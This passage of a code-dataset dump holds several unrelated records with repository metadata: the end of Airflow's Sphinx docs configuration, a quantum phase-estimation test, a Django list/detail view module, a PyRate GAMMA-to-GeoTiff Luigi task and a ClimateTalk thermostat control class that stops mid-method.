# tuple containing the filename string and the attributes dictionary. The
# filename must be relative to the html_static_path, or a full URI with
# scheme like http://example.org/script.js.
html_js_files = ['jira-links.js']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
if airflow_theme_is_available:
html_sidebars = {
'**': [
'version-selector.html',
'searchbox.html',
'globaltoc.html',
]
}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
html_show_copyright = False
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'Airflowdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
# 'preamble': '',
} # type: Dict[str,str]
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'Airflow.tex', u'Airflow Documentation',
u'Apache Airflow', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'airflow', u'Airflow Documentation',
[u'Apache Airflow'], 1)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [(
'index', 'Airflow', u'Airflow Documentation',
u'Apache Airflow', 'Airflow',
'Airflow is a system to programmatically author, schedule and monitor data pipelines.',
'Miscellaneous'
), ]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
# texinfo_no_detailmenu = False
# sphinx-autoapi configuration
# See:
# https://sphinx-autoapi.readthedocs.io/en/latest/config.html
# Paths (relative or absolute) to the source code that you wish to generate
# your API documentation from.
autoapi_dirs = [
os.path.abspath('../airflow'),
]
# A directory that has user-defined templates to override our default templates.
autoapi_template_dir = 'autoapi_templates'
# A list of patterns to ignore when finding files
autoapi_ignore = [
# These modules are backcompat shims, don't build docs for them
'*/airflow/contrib/operators/s3_to_gcs_transfer_operator.py',
'*/airflow/contrib/operators/gcs_to_gcs_transfer_operator.py',
'*/airflow/contrib/operators/gcs_to_gcs_transfer_operator.py',
'*/airflow/kubernetes/kubernetes_request_factory/*',
'*/node_modules/*',
'*/migrations/*',
]
# Keep the AutoAPI generated files on the filesystem after the run.
# Useful for debugging.
autoapi_keep_files = True
# Relative path to output the AutoAPI files into. This can also be used to place the generated documentation
# anywhere in your documentation hierarchy.
autoapi_root = '_api'
# -- Options for examole include ------------------------------------------
exampleinclude_sourceroot = os.path.abspath('..')
# -- Additional HTML Context variable
html_context = {
# Google Analytics ID.
# For more information look at:
# https://github.com/readthedocs/sphinx_rtd_theme/blob/master/sphinx_rtd_theme/layout.html#L222-L232
'theme_analytics_id': 'UA-140539454-1',
}
if airflow_theme_is_available:
html_context = {
# Variables used to build a button for editing the source code
#
# The path is created according to the following template:
#
# https://{{ github_host|default("github.com") }}/{{ github_user }}/{{ github_repo }}/
# {{ theme_vcs_pageview_mode|default("blob") }}/{{ github_version }}{{ conf_py_path }}
# {{ pagename }}{{ suffix }}
#
# More information:
# https://github.com/readthedocs/readthedocs.org/blob/master/readthedocs/doc_builder/templates/doc_builder/conf.py.tmpl#L100-L103
# https://github.com/readthedocs/sphinx_rtd_theme/blob/master/sphinx_rtd_theme/breadcrumbs.html#L45
# https://github.com/apache/airflow-site/blob/91f760c/sphinx_airflow_theme/sphinx_airflow_theme/suggest_change_button.html#L36-L40
#
'theme_vcs_pageview_mode': 'edit',
'conf_py_path': '/docs/',
'github_user': 'apache',
'github_repo': 'airflow',
'github_version': 'master',
'display_github': 'master',
'suffix': '.rst',
}
html_theme_options = {
'hide_website_buttons': False,
'navbar_links': [
{'href': '/community/', 'text': 'Community'},
{'href': '/meetups/', 'text': 'Meetups'},
{'href': '/docs/', 'text': 'Documentation'},
{'href': '/use-cases/', 'text': 'Use-cases'},
{'href': '/announcements/', 'text': 'Announcements'},
{'href': '/blog/', 'text': 'Blog'},
{'href': '/ecosystem/', 'text': 'Ecosystem'},
]
}
| 33.880734 | 138 | 0.692066 |
b91e8eb1e974a71c93850c211acb4b2d2e946504 | 1,056 | py | Python | grove/tests/phaseestimation/test_phaseestimation.py | msohaibalam/grove | 8c27a5d12923d6ace57956db6a249e8d01e33f35 | [
"Apache-2.0"
] | 1 | 2020-07-15T15:40:49.000Z | 2020-07-15T15:40:49.000Z | grove/tests/phaseestimation/test_phaseestimation.py | msohaibalam/grove | 8c27a5d12923d6ace57956db6a249e8d01e33f35 | [
"Apache-2.0"
] | null | null | null | grove/tests/phaseestimation/test_phaseestimation.py | msohaibalam/grove | 8c27a5d12923d6ace57956db6a249e8d01e33f35 | [
"Apache-2.0"
] | 1 | 2021-11-27T16:20:00.000Z | 2021-11-27T16:20:00.000Z | import numpy as np
from pyquil.gates import H, CPHASE, SWAP, MEASURE
import pyquil.quil as pq
from grove.qft.fourier import inverse_qft
from grove.alpha.phaseestimation.phase_estimation import controlled
from grove.alpha.phaseestimation.phase_estimation import phase_estimation
def test_phase_estimation():
    """Check phase_estimation() against a manually assembled program."""
    precision = 4
    # Diagonal unitary whose eigenvalue encodes a phase of 0.75 turns.
    eigenphase = np.exp(1.0j * 2 * np.pi * 0.75)
    unitary = np.array([[eigenphase, 0],
                        [0, -1 * eigenphase]])
    generated = phase_estimation(unitary, precision)
    # Build the expected program by hand: Hadamards on the readout register,
    # then successively squared controlled-U gates, inverse QFT, measurement.
    expected = pq.Program([H(qubit) for qubit in range(precision)])
    target = (precision,)  # single output qubit after the readout register
    power = unitary
    for step in range(precision):
        if step > 0:
            power = np.dot(power, power)
        gate_name = "CONTROLLED-U{0}".format(2 ** step)
        expected.defgate(gate_name, controlled(power))
        expected.inst((gate_name, step) + target)
    expected += inverse_qft(range(precision))
    expected += [MEASURE(qubit, [qubit]) for qubit in range(precision)]
    assert generated == expected
| 28.540541 | 73 | 0.642045 |
a0421ba1db4b3e7f8fef11ee361550e414c51461 | 620 | py | Python | hn_clone/posts/views.py | bkavanagh/dj-hackernews-clone | 543d2774c2b956dd6aadd81a4f51c3df6c3e9060 | [
"MIT"
] | null | null | null | hn_clone/posts/views.py | bkavanagh/dj-hackernews-clone | 543d2774c2b956dd6aadd81a4f51c3df6c3e9060 | [
"MIT"
] | null | null | null | hn_clone/posts/views.py | bkavanagh/dj-hackernews-clone | 543d2774c2b956dd6aadd81a4f51c3df6c3e9060 | [
"MIT"
] | null | null | null | from django.shortcuts import (
render, get_object_or_404,
)
from django.views import generic
from .models import (
Post, Author, Tag
)
class IndexView(generic.ListView):
    """List all posts on the index page, newest first."""
    # model = Post
    template_name = 'posts/index.html'
    context_object_name = 'posts_list'
    def get_queryset(self):
        """Return every Post ordered by creation time, newest first."""
        return Post.objects.order_by('-created')
class DetailView(generic.DetailView):
    """Render a single post.

    Bug fix: the original ``get_object`` hard-coded ``id=1`` as its default,
    so the view always displayed post #1 no matter which URL was requested.
    The primary key is now resolved from the URL kwargs when no explicit
    ``id`` argument is supplied; passing ``id`` still works as before.
    """
    model = Post
    template_name = 'posts/detail.html'
    context_object_name = 'post'
    def get_object(self, queryset=None, id=None):
        """Return the Post identified by ``id`` or the URL's pk kwarg.

        :param queryset: unused; kept for DetailView signature compatibility
        :param id: explicit primary key; falls back to the URLconf's pk kwarg
        :raises Http404: if no matching Post exists
        """
        if id is None:
            # Django's DetailView convention: the URLconf captures the key
            # under ``self.pk_url_kwarg`` (default ``'pk'``).
            id = self.kwargs.get(self.pk_url_kwarg)
        return get_object_or_404(Post, pk=id)
| 22.962963 | 48 | 0.653226 |
2c6dd49259763070f73dde8c3b8bb67174433f99 | 4,131 | py | Python | pyrate/tasks/gamma.py | jlmaurer/PyRate | bf1a3d916f1c83e7a0dda3ecc15858f8f1e4ee84 | [
"Apache-2.0"
] | 1 | 2018-11-01T04:45:19.000Z | 2018-11-01T04:45:19.000Z | pyrate/tasks/gamma.py | bingo456/PyRate | bf1a3d916f1c83e7a0dda3ecc15858f8f1e4ee84 | [
"Apache-2.0"
] | null | null | null | pyrate/tasks/gamma.py | bingo456/PyRate | bf1a3d916f1c83e7a0dda3ecc15858f8f1e4ee84 | [
"Apache-2.0"
] | 1 | 2020-12-31T00:34:35.000Z | 2020-12-31T00:34:35.000Z | # This Python module is part of the PyRate software package.
#
# Copyright 2017 Geoscience Australia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This Python module is a Luigi wrapper for converting GAMMA format input data.
"""
# pylint: disable=attribute-defined-outside-init
import os
from os.path import join
import re
import glob2
import luigi
from pyrate import config
from pyrate.gamma import manage_headers
from pyrate.shared import write_geotiff, output_tiff_filename
from pyrate.tasks.utils import IfgListMixin, InputParam
PTN = re.compile(r'\d{8}') # match 8 digits for the dates
class GammaHasRun(luigi.task.ExternalTask):
    """
    Phantom task used to ensure that the required outputs from GAMMA exist.
    """
    fileName = luigi.Parameter()
    masterHeader = luigi.Parameter(default=None)
    slaveHeader = luigi.Parameter(default=None)
    def output(self):
        # The data file is always a target; header files only when supplied.
        paths = [self.fileName]
        paths += [hdr for hdr in (self.masterHeader, self.slaveHeader)
                  if hdr is not None]
        return [luigi.LocalTarget(path) for path in paths]
def get_header_paths(input_file, slc_dir=None):
    """
    Match an input GAMMA file name with its GAMMA SLC header file names.

    :param str input_file: input GAMMA .unw file.
    :param str slc_dir: GAMMA SLC header file directory; when omitted the
        headers are searched for next to ``input_file``.

    :return: list of matching header files (first glob hit per 8-digit date)
    :rtype: list
    """
    base_dir, file_name = os.path.split(input_file)
    if slc_dir:
        # Header files live in the dedicated SLC directory when one is given.
        base_dir = slc_dir
    header_paths = []
    for date_str in PTN.findall(file_name):
        pattern = join(base_dir, '**/*%s*slc.par' % date_str)
        header_paths.append(glob2.glob(pattern)[0])
    return header_paths
class ConvertFileToGeotiff(luigi.Task):
    """
    Task responsible for converting a GAMMA file to GeoTiff.

    All parameters except ``input_file`` are resolved from the PyRate
    configuration via :class:`InputParam`.
    """
    # Path of the GAMMA binary file to convert.
    input_file = luigi.Parameter()
    # DEM header file providing geo-referencing information.
    demHeaderFile = luigi.Parameter(
        config_path=InputParam(config.DEM_HEADER_FILE))
    # Directory the GeoTiff output is written into.
    out_dir = luigi.Parameter(config_path=InputParam(config.OUT_DIR))
    # Value written into the GeoTiff for missing/no-data cells.
    no_data_value = luigi.FloatParameter(
        config_path=InputParam(config.NO_DATA_VALUE))
    # Optional directory holding the GAMMA SLC header (slc.par) files.
    slc_dir = luigi.Parameter(config_path=InputParam(config.SLC_DIR))
    def requires(self):
        """
        Overload of :py:meth:`luigi.Task.requires`. Ensures that the required
        input exists.

        Side effect: caches the matched header paths on ``self.header_paths``
        for reuse in :py:meth:`run` (hence the pylint disable at file top).
        """
        self.header_paths = get_header_paths(self.input_file, self.slc_dir)
        # Two headers (master + slave) indicate an interferogram; anything
        # else is treated as a standalone file with no header targets.
        if len(self.header_paths) == 2:
            tasks = [GammaHasRun(
                fileName=self.input_file,
                masterHeader=self.header_paths[0],
                slaveHeader=self.header_paths[1])]
        else:
            tasks = [GammaHasRun(fileName=self.input_file)]
        return tasks
    def output(self):
        """
        Overload of :py:meth:`luigi.Task.output`.

        Side effect: caches the output path on ``self.out_file`` for
        :py:meth:`run`.
        """
        self.out_file = output_tiff_filename(self.input_file, self.out_dir)
        return [luigi.LocalTarget(self.out_file)]
    def run(self):
        """
        Overload of :py:meth:`luigi.Task.run`.

        Merges the DEM header with the SLC headers found by
        :py:meth:`requires`, then writes the GeoTiff to ``self.out_file``.
        """
        combined_header = manage_headers(self.demHeaderFile, self.header_paths)
        write_geotiff(combined_header, self.input_file,
                      self.out_file, self.no_data_value)
class ConvertToGeotiff(IfgListMixin, luigi.WrapperTask):
    """Wrapper task that fans out one GeoTiff conversion per GAMMA file."""
    def requires(self):
        # Schedule a conversion task for every non-tif interferogram path.
        tasks = []
        for path in self.ifg_list(tif=False):
            tasks.append(ConvertFileToGeotiff(input_file=path))
        return tasks
| 34.425 | 79 | 0.682885 |
76e8628625ed6f460e7592a885d8361499c06016 | 33,421 | py | Python | climatetalk/mdi/thermostat.py | kdschlosser/ClimateTalk | 3b09a45c295cf5228283d7095834e8f133ed7de3 | [
"MIT"
] | 3 | 2021-04-30T20:12:16.000Z | 2022-03-09T11:53:12.000Z | climatetalk/mdi/thermostat.py | kdschlosser/ClimateTalk | 3b09a45c295cf5228283d7095834e8f133ed7de3 | [
"MIT"
] | null | null | null | climatetalk/mdi/thermostat.py | kdschlosser/ClimateTalk | 3b09a45c295cf5228283d7095834e8f133ed7de3 | [
"MIT"
] | 2 | 2021-04-08T18:29:39.000Z | 2021-04-30T20:13:55.000Z | # -*- coding: utf-8 -*-
# Copyright 2020 Kevin Schlosser
import datetime
import threading
from ..utils import (
get_bit as _get_bit,
set_bit as _set_bit,
TwosCompliment
)
from ..packet import (
GetConfigurationRequest,
GetStatusRequest
)
from ..commands import (
SystemSwitchModify,
HeatSetPointTemperatureModify,
CoolSetPointTemperatureModify,
PermanentSetPointTempHoldModify,
HoldOverride,
RealTimeDayOverride,
HeatProfileChange,
CoolProfileChange,
FanKeySelection,
SubsystemInstallationTest,
BeeperEnable,
FahrenheitCelsiusDisplay,
ComfortRecoveryModify,
ChangeFilterTimeRemaining,
VacationMode,
TempDisplayAdjFactorChange,
CompressorLockout,
CustomMessageAreaDisplayData,
SetPointTempAndTemporaryHold,
ContinuousDisplayLight,
AdvanceRealTimeDayOverride,
KeypadLockout,
SetPointTempTimeHold,
ComfortModeModification,
LimitedHeatAndCoolRange,
ChangeUvLightMaintenanceTimer,
ChangeHumidifierPadMaintTimerall,
RestoreFactoryDefaults,
# ReversingValveConfig,
# HumDehumConfig,
HeatDemand,
AuxHeatDemand,
BackUpHeatDemand,
FanDemand,
CoolDemand,
DehumidificationDemand,
HumidificationDemand,
HumidificationSetPointModify,
DehumidificationSetPointModify,
CommunicationsReceiverOnOff,
ForcePhoneNumberDisplay,
FAN_DEMAND_MANUAL as _FAN_DEMAND_MANUAL,
FAN_DEMAND_COOL as _FAN_DEMAND_COOL,
FAN_DEMAND_HEAT as _FAN_DEMAND_HEAT,
FAN_DEMAND_AUX_HEAT as _FAN_DEMAND_AUX_HEAT,
FAN_DEMAND_EMERGENCY_HEAT as _FAN_DEMAND_EMERGENCY_HEAT,
FAN_DEMAND_DEFROST as _FAN_DEMAND_DEFROST
)
THERMOSTAT_SYSTEM_TYPE_UNKNOWN = 0x00
THERMOSTAT_SYSTEM_TYPE_CONVENTIONAL = 0x01
THERMOSTAT_SYSTEM_TYPE_HEAT_PUMP = 0x02
THERMOSTAT_SYSTEM_TYPE_DUAL_FUEL = 0x03
THERMOSTAT_SYSTEM_TYPE_COOLING = 0x04
THERMOSTAT_SYSTEM_TYPE_GAS_HEAT = 0x05
THERMOSTAT_SYSTEM_TYPE_ELECTRIC_HEAT = 0x06
THERMOSTAT_SYSTEM_TYPE_ELECTRIC_ONLY = 0x07
THERMOSTAT_SYSTEM_TYPE_FAN_ONLY = 0x08
THERMOSTAT_SYSTEM_TYPE_GEOTHERMAL_HEAT_PUMP = 0x09
THERMOSTAT_SYSTEM_TYPE_GEOTHERMAL_DUAL_FUEL = 0x0A
THERMOSTAT_SYSTEM_TYPE_BOILER = 0x0B
THERMOSTAT_SYSTEM_TYPE_BOILER_HEAT_PUMP = 0x0C
THERMOSTAT_SYSTEM_TYPE_UNUSED = 0x7F
THERMOSTAT_SYSTEM_TYPE_OTHER = 0xFF
THERMOSTAT_ENABLED = 0x01
THERMOSTAT_DISABLED = 0x00
THERMOSTAT_CAPABLE = 0x01
THERMOSTAT_NOT_CAPABLE = 0x00
THERMOSTAT_SCALE_FAHRENHEIT = 0x01
THERMOSTAT_SCALE_CELSIUS = 0x00
THERMOSTAT_CYCLE_RATE_FAST = 0xFF
THERMOSTAT_CYCLE_RATE_SLOW = 0xFE
THERMOSTAT_SENSOR_WEIGHT_DEFAULT = 0x00
THERMOSTAT_SENSOR_WEIGHT_LOW = 0x01
THERMOSTAT_SENSOR_WEIGHT_MEDIUM = 0x02
THERMOSTAT_SENSOR_WEIGHT_HIGH = 0x03
THERMOSTAT_TYPE_COMMERCIAL = 0x01
THERMOSTAT_TYPE_RESIDENTIAL = 0x00
THERMOSTAT_PROFILE_TYPE_NON_PROGRAMMABLE = 0x00
THERMOSTAT_PROFILE_TYPE_7_DAY = 0x01
THERMOSTAT_PROFILE_TYPE_5_1_1 = 0x02
THERMOSTAT_PROFILE_TYPE_5_2 = 0x03
THERMOSTAT_INTERVAL_TYPE_NON_PROGRMMABLE = 0x00
THERMOSTAT_INTERVAL_TYPE_2_STEP = 0x01
THERMOSTAT_INTERVAL_TYPE_4_STEP = 0x02
THERMOSTAT_KEYPAD_LOCKOUT_OFF = 0x00
THERMOSTAT_KEYPAD_LOCKOUT_PARTIAL = 0x01
THERMOSTAT_KEYPAD_LOCKOUT_FULL = 0x02
THERMOSTAT_SYSTEM_STATUS_OFF = 0x00
THERMOSTAT_SYSTEM_STATUS_COOL = 0x01
THERMOSTAT_SYSTEM_STATUS_AUTO_COOL = 0x02
THERMOSTAT_SYSTEM_STATUS_HEAT = 0x03
THERMOSTAT_SYSTEM_STATUS_AUTO_HEAT = 0x04
THERMOSTAT_SYSTEM_STATUS_BACKUP = 0x05
THERMOSTAT_CURTAILMENT_STATUS_NONE = 0x00
THERMOSTAT_CURTAILMENT_STATUS_DLC = 0x01
THERMOSTAT_CURTAILMENT_STATUS_TIERED = 0x02
THERMOSTAT_CURTAILMENT_STATUS_RTP_PROTECTION = 0x03
THERMOSTAT_CURTAILMENT_STATUS_RTP = 0x04
THERMOSTAT_FAN_STATUS_AUTO = 0x00
THERMOSTAT_FAN_STATUS_ALWAYS_ON = 0x01
THERMOSTAT_FAN_STATUS_OCCUPIED_ON = 0x02
class ThermostatMDI(object):
def __init__(self, network, address, subnet, mac_address, session_id):
self.network = network
self.address = address
self.subnet = subnet
self.mac_address = mac_address
self.session_id = session_id
def _send(self, packet):
"""
:type packet: .. py:class:: climatetalk.packet.Packet
:return:
"""
packet.destination = self.address
packet.subnet = self.subnet
packet.packet_number = 0x00
self.network.send(packet)
def _get_status_mdi(self, byte_num, num_bytes):
num_bytes += 1
packet = GetStatusRequest()
packet.destination = self.address
packet.subnet = self.subnet
packet.packet_number = 0x00
event = threading.Event()
data = bytearray()
def callback(response):
data.extend(
response.payload_data[byte_num:byte_num + num_bytes]
)
GetConfigurationRequest.message_type.disconnect(
self.address,
self.subnet
)
event.set()
GetConfigurationRequest.message_type.connect(
self.address,
self.subnet,
callback
)
self.network.send(packet)
event.wait()
return data
def _get_mdi(self, byte_num, num_bytes):
num_bytes += 1
packet = GetConfigurationRequest()
packet.destination = self.address
packet.subnet = self.subnet
packet.packet_number = 0x00
event = threading.Event()
data = bytearray()
def callback(response):
data.extend(
response.payload_data[byte_num:byte_num + num_bytes]
)
GetConfigurationRequest.message_type.disconnect(
self.address,
self.subnet
)
event.set()
GetConfigurationRequest.message_type.connect(
self.address,
self.subnet,
callback
)
self.network.send(packet)
event.wait()
return data
@property
def system_type(self):
"""
:return: one of THERMOSTAT_SYSTEM_TYPE_* constants
"""
data = self._get_mdi(0, 0)
return data[0]
@property
def heat_stages(self):
"""
:return: number of stages, 15 = Variable/Modulating
"""
data = self._get_mdi(1, 0)
return data[0] >> 4
@property
def cool_stages(self):
"""
:return: number of stages, 15 = Variable/Modulating
"""
data = self._get_mdi(1, 0)
return data[0] & 0xF
@property
def balance_point_set_temp(self):
"""
:return:
0x00 = Balance Point System is off
0xFF = Default value indicating that this is not being used
0x01 - 0x7F =
"""
data = self._get_mdi(2, 0)
return data[0]
@property
def filter_time(self):
"""
:return: hours
"""
data = self._get_mdi(3, 1)
return data[0] << 8 | data[1]
@filter_time.setter
def filter_time(self, value):
packet = ChangeFilterTimeRemaining()
if value is True:
packet.set_command_data(value)
elif isinstance(value, int):
packet.set_command_data(False, value)
else:
return
self._send(packet)
@property
def temp_adjustment_offset(self):
data = self._get_mdi(5, 0)
return TwosCompliment.decode(data[0], 8)
@temp_adjustment_offset.setter
def temp_adjustment_offset(self, value):
packet = TempDisplayAdjFactorChange()
packet.set_command_data(value)
self._send(packet)
@property
def programmable_hold_time(self):
"""
:return:
0x00 = disabled
0xFFFF = default value
"""
data = self._get_mdi(6, 1)
return data[0] << 8 | data[1]
@property
def max_temp(self):
"""
:return: 0xFF = not set/default
"""
data = self._get_mdi(8, 0)
return data[0]
@max_temp.setter
def max_temp(self, value):
packet = LimitedHeatAndCoolRange()
packet.set_command_data(self.min_temp, value)
self._send(packet)
@property
def min_temp(self):
"""
:return: 0xFF = not set/default
"""
data = self._get_mdi(9, 0)
return data[0]
@min_temp.setter
def min_temp(self, value):
packet = LimitedHeatAndCoolRange()
packet.set_command_data(value, self.max_temp)
self._send(packet)
@property
def emr_state(self):
"""
:return: THERMOSTAT_ENABLED or THERMOSTAT_DISABLED
"""
data = self._get_mdi(10, 0)
return int(_get_bit(data[0], 0))
@emr_state.setter
def emr_state(self, value):
packet = ComfortRecoveryModify()
data = self._get_mdi(10, 0)
packet.set_command_data(_get_bit(data[0], 7), value)
self._send(packet)
@property
def keypad_lockout(self):
"""
:return: one of THERMOSTAT_KEYPAD_LOCKOUT_* constants
"""
data = self._get_mdi(10, 0)
if _get_bit(data[0], 6):
data = self._get_mdi(22, 0)
if _get_bit(data[0], 2):
return THERMOSTAT_KEYPAD_LOCKOUT_PARTIAL
elif _get_bit(data[0], 1):
return THERMOSTAT_KEYPAD_LOCKOUT_FULL
return THERMOSTAT_KEYPAD_LOCKOUT_OFF
def set_keypad_lockout(self, lockout_type, password):
packet = KeypadLockout()
packet.set_command_data(lockout_type, password)
self._send(packet)
@property
def scale(self):
"""
:return: one of THERMOSTAT_SCALE_* constants
"""
data = self._get_mdi(10, 0)
return int(_get_bit(data[0], 5))
@scale.setter
def scale(self, value):
packet = FahrenheitCelsiusDisplay()
packet.set_command_data(value)
self._send(packet)
@property
def fast_second_stage(self):
"""
:return: THERMOSTAT_ENABLED or THERMOSTAT_DISABLED
"""
data = self._get_mdi(10, 0)
return int(_get_bit(data[0], 4))
@fast_second_stage.setter
def fast_second_stage(self, value):
packet = ComfortModeModification()
packet.set_command_data(value)
self._send(packet)
@property
def continious_display_light(self):
"""
:return: THERMOSTAT_ENABLED or THERMOSTAT_DISABLED
"""
data = self._get_mdi(10, 0)
return int(_get_bit(data[0], 3))
@continious_display_light.setter
def continious_display_light(self, value):
packet = ContinuousDisplayLight()
packet.set_command_data(value)
self._send(packet)
@property
def compressor_lockout(self):
"""
:return: THERMOSTAT_ENABLED or THERMOSTAT_DISABLED
"""
data = self._get_mdi(10, 0)
return int(_get_bit(data[0], 2))
@compressor_lockout.setter
def compressor_lockout(self, value):
packet = CompressorLockout()
packet.set_command_data(value)
self._send(packet)
@property
def heat_cycle_rate(self):
"""
:return: % or one of THERMOSTAT_CYCLE_RATE_* constants
"""
data = self._get_mdi(20, 0)
if data[0]:
return float(data[0]) * 0.5
data = self._get_mdi(10, 0)
return int(_get_bit(data[0], 1)) + 254
@property
def cool_cycle_rate(self):
"""
:return: % or one of THERMOSTAT_CYCLE_RATE_* constants
"""
data = self._get_mdi(21, 0)
if data[0]:
return float(data[0]) * 0.5
data = self._get_mdi(10, 0)
return int(_get_bit(data[0], 0)) + 254
@property
def sensor_d_weight(self):
"""
:return: one of THERMOSTAT_SENSOR_WEIGHT_* constants
"""
res = 0
data = self._get_mdi(11, 0)
res = _set_bit(res, 1, _get_bit(data[0], 7))
res = _set_bit(res, 0, _get_bit(data[0], 6))
return res
@property
def sensor_c_weight(self):
"""
:return: one of THERMOSTAT_SENSOR_WEIGHT_* constants
"""
res = 0
data = self._get_mdi(11, 0)
res = _set_bit(res, 1, _get_bit(data[0], 5))
res = _set_bit(res, 0, _get_bit(data[0], 4))
return res
@property
def sensor_b_weight(self):
"""
:return: one of THERMOSTAT_SENSOR_WEIGHT_* constants
"""
res = 0
data = self._get_mdi(11, 0)
res = _set_bit(res, 1, _get_bit(data[0], 3))
res = _set_bit(res, 0, _get_bit(data[0], 2))
return res
@property
def sensor_a_weight(self):
"""
:return: one of THERMOSTAT_SENSOR_WEIGHT_* constants
"""
res = 0
data = self._get_mdi(11, 0)
res = _set_bit(res, 1, _get_bit(data[0], 1))
res = _set_bit(res, 0, _get_bit(data[0], 0))
return res
@property
def sensor_local_weight(self):
"""
:return: one of THERMOSTAT_SENSOR_WEIGHT_* constants
"""
res = 0
data = self._get_mdi(12, 0)
res = _set_bit(res, 1, _get_bit(data[0], 7))
res = _set_bit(res, 0, _get_bit(data[0], 6))
return res
@property
def type(self):
"""
:return: one of THERMOSTAT_TYPE_* constants
"""
data = self._get_mdi(12, 0)
return int(_get_bit(data[0], 4))
@property
def schedule_profile_type(self):
"""
:return: one of THERMOSTAT_PROFILE_TYPE_* constants
"""
res = 0
data = self._get_mdi(12, 0)
res = _set_bit(res, 1, _get_bit(data[0], 3))
res = _set_bit(res, 0, _get_bit(data[0], 2))
return res
@schedule_profile_type.setter
def schedule_profile_type(self, value):
packet = HeatProfileChange()
packet.set_command_data(
self.schedule_interval_type,
value,
self.heat_schedule
)
self._send(packet)
packet = CoolProfileChange()
packet.set_command_data(
self.schedule_interval_type,
value,
self.cool_schedule
)
self._send(packet)
@property
def cool_schedule(self):
return None
@property
def heat_schedule(self):
return None
@property
def schedule_interval_type(self):
"""
:return: one of THERMOSTAT_INTERVAL_TYPE_* constants
"""
res = 0
data = self._get_mdi(12, 0)
res = _set_bit(res, 1, _get_bit(data[0], 1))
res = _set_bit(res, 0, _get_bit(data[0], 0))
return res
@schedule_interval_type.setter
def schedule_interval_type(self, value):
packet = HeatProfileChange()
packet.set_command_data(
value,
self.schedule_profile_type,
self.heat_schedule
)
self._send(packet)
packet = CoolProfileChange()
packet.set_command_data(
value,
self.schedule_profile_type,
self.cool_schedule
)
self._send(packet)
@property
def air_handler_lockout_temp(self):
"""
:return: 0xFF = not set/default
"""
data = self._get_mdi(13, 0)
return data[0]
@property
def uv_lamp_time(self):
"""
:return: days
0x0000 = disabled
0xFFFF = default
"""
data = self._get_mdi(14, 1)
return data[0] << 8 | data[1]
@uv_lamp_time.setter
def uv_lamp_time(self, value):
packet = ChangeUvLightMaintenanceTimer()
if value is False:
packet.set_command_data(value)
elif isinstance(value, int):
packet.set_command_data(False, value)
self._send(packet)
@property
def humidifier_pad_time(self):
"""
:return: hours
0x0000 = disabled
0xFFFF = default
"""
data = self._get_mdi(16, 1)
return data[0] << 8 | data[1]
@humidifier_pad_time.setter
def humidifier_pad_time(self, value):
packet = ChangeHumidifierPadMaintTimerall()
if value is False:
packet.set_command_data(value)
elif isinstance(value, int):
packet.set_command_data(False, value)
self._send(packet)
@property
def aux_heat_stages(self):
    """Number of auxiliary-heat stages, read from MDI byte 18.

    The byte packs two nibbles: aux-heat stages in the high nibble and
    fan stages in the low nibble (see ``fan_stages``).

    :return: stage count; 0x0F = modulating
    """
    data = self._get_mdi(18, 0)
    # High nibble of the byte.  The original expression
    # `data[0] << 4 & 0xF` always evaluated to 0 because a left shift
    # clears the low four bits; a right shift is required to extract
    # the upper nibble.
    return (data[0] >> 4) & 0xF
@property
def fan_stages(self):
    """Number of fan stages (low nibble of MDI byte 18).

    :return: stage count; 0x0F = modulating
    """
    byte = self._get_mdi(18, 0)[0]
    return byte & 0x0F
@property
def aux_heat_cycle_rate(self):
"""
:return: Default/Unused is 0; Percentage - 0.5% Increments.
"""
data = self._get_mdi(19, 0)
return data[0]
@property
def ob_mode(self):
"""
:return: 0 = O Mode/Unavailable; 1 = B Mode
"""
data = self._get_mdi(22, 0)
return int(_get_bit(data[0], 6))
@property
def beep(self):
"""
:return: THERMOSTAT_ENABLED or THERMOSTAT_DISABLED
"""
data = self._get_mdi(22, 0)
return int(_get_bit(data[0], 5))
@beep.setter
def beep(self, value):
packet = BeeperEnable()
